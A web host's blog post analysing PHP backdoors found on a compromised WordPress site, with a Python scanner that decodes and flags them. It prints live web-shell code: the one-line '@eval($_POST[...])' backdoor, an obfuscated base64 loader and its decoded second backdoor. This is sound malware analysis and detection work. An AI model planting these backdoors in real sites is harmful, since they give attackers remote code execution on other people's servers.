Hack and Hack again


Every month I spend a small portion of my time repairing an exploited website. These are usually websites we have migrated from another hosting provider, where our new client had constant issues and little to no support from the previous hosting company. In frustration they sought out our services and we moved the site free of charge onto one of our managed hosting servers.

Now the fun starts.

When we do a site migration we move everything across and sort out what is a live working site and what is legacy and obsolete. Since most sites we bring across are WordPress, we often drop their themes and plugins into an updated WordPress core, or we run the core upgrade after migration (and a fresh full backup) so it's on the latest version with a more recent PHP version. If the site works then all is well and we continue checking theme code and plugins. If it doesn't, we look through the error logs and let the client know the bad news.

The other task we perform is a series of file scans looking for exploits, and almost all the sites we bring across have several files with an exploit. Today a site came across with almost 150 compromised files! To cut to the chase, two of the plugins were bogus and provided an easy entry point. As I explored the files I noticed several carried a different exploit, and I also spotted something odd: exploit code placed in front of other, unrelated exploit code. Below is the single-line code snippet I found in 150 files:

<?php @eval($_POST['dd']);?>

I've written about reverse engineering exploits before; a quick search on this blog will turn up some, and a visit to Conetix Web Hosting (who have published some of my other articles) will yield more. Below is a copy of one of the more complex pieces of code I found in a number of other files:

<?php
$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};
$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};
$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};
$OO0000=$O00OO0{7}.$O00OO0{13};
$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};
eval($O00O0O("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"));
@eval($_POST['dd']);?>

The last line of the exploit is cute: it is the same one-liner common to almost all of the other files. Decoding the exploit that gets called first yields:

$fukq = @$_GET['fukq'];
if($fukq == 't'){echo(@eval($_POST['fuckyou4321']));exit;}
$fukq = @$_GET['fukq'];
if($fukq == 't'){echo(@eval($_POST['fuckyou4321']));exit;}
echo apiRequest();
function apiRequest(){
    if(@$_GET['op'] == 'check') {
        return "connectjbmoveisok";
        exit();
    }
}
?>

With the exit() call at the end, execution stops, which means the @eval() call after it never gets called, so the file has been compromised by two different people at different times! Talk about bad luck 🙂
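The loader above hides its function names by picking single characters out of the urldecode()'d string by offset. The following Python script is an added example (not from this post) that resolves those offset-built names statically, without executing any PHP, and flags both indicators seen here: an eval() of raw request data and an eval() whose function name is assembled from offsets. The sample file is the loader header quoted above with the base64 payload replaced by a placeholder.

```python
import re
from urllib.parse import unquote

# Constructed sample: the loader header quoted in the post, with the base64
# payload replaced by a placeholder (the real payload is not reproduced).
SAMPLE = r'''<?php
$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};
$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};
$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};
$OO0000=$O00OO0{7}.$O00OO0{13};
$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};
eval($O00O0O("<PAYLOAD-PLACEHOLDER>"));
@eval($_POST['dd']);?>
'''

ASSIGN = re.compile(r'(\$\w+)(\.?=)(.+?);')          # $var=...; or $var.=...;
URLDEC = re.compile(r'urldecode\("([^"]*)"\)')       # the character alphabet
OFFSET = re.compile(r'(\$\w+)\{(\d+)\}')             # $var{n} single-char offset
BACKDOOR = re.compile(r'@?eval\(\s*\$_(POST|GET|REQUEST|COOKIE)\[')
EVAL_VAR = re.compile(r'eval\((\$\w+)\(')            # eval($fn(...)) with built-up name

def resolve_names(php: str) -> dict:
    """Rebuild strings assembled from single-character offsets, without eval."""
    env = {}
    for var, op, rhs in ASSIGN.findall(php):
        m = URLDEC.fullmatch(rhs.strip())
        if m:                                   # the decoded alphabet string
            env[var] = unquote(m.group(1))
            continue
        parts = OFFSET.findall(rhs)
        if not parts or len(parts) != len(rhs.split('.')):
            continue                            # not a pure offset concatenation
        try:
            value = ''.join(env[v][int(i)] for v, i in parts)
        except (KeyError, IndexError):
            continue                            # refers to something we did not see
        env[var] = env.get(var, '') + value if op == '.=' else value
    return env

def scan(php: str) -> list:
    """Return findings for one file's contents; empty list means nothing seen."""
    findings = []
    if BACKDOOR.search(php):
        findings.append('eval() of raw request data (one-line backdoor)')
    names = resolve_names(php)
    for var in EVAL_VAR.findall(php):
        findings.append(f'eval({names.get(var, var)}(...)) with function name built from offsets')
    return findings
```

Run against the sample, resolve_names() shows $O00O0O is "base64_decode", $O0OO00 is "strtr", $OO0O00 is "substr" and $OO0000 is "52", so the loader is an eval(base64_decode(...)) with a substitution step, and scan() reports both the loader and the trailing one-liner.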

-oOo-